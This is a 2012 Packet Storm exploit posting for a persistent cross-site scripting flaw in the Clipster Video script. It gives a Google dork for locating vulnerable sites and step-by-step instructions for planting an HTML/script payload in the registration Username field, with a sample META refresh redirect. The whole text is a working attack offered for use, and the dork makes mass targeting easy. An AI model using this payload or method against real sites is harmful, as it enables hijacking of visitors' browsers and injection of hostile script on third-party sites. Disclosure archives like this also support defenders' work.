Clipster Video Cross Site Scripting

2012-09-08T00:00:00
ID PACKETSTORM:116330
Type packetstorm
Reporter DaOne
Modified 2012-09-08T00:00:00

Description

                                        
                                            `##########################################  
[~] Exploit Title: Clipster Video Persistent XSS Vulnerability  
[~] Date: 04/09/2012  
[~] Author: DaOne  
[~] Software Link: http://www.clipsterscript.com/  
[~] Google Dork: "Powered by ClipsterScript.com"  
##########################################  
  
[#] How to exploit:  
  
1-go to : http://site.com/login.php?action=Register  
2-Put in the Username field the XSS Code => Example:<META http-equiv="refresh" content="0;URL=http://www.google.com">  
3-Put anything in the other field [Password & E-mail] etc...  
4-Now anyone go there : http://site.com/ will redirected to google.com or exploit your XSS Code.  
  
  
  
##########################################  
[*] Contact me  
www.facebook.com/LibyanCA2  
##########################################  
  
`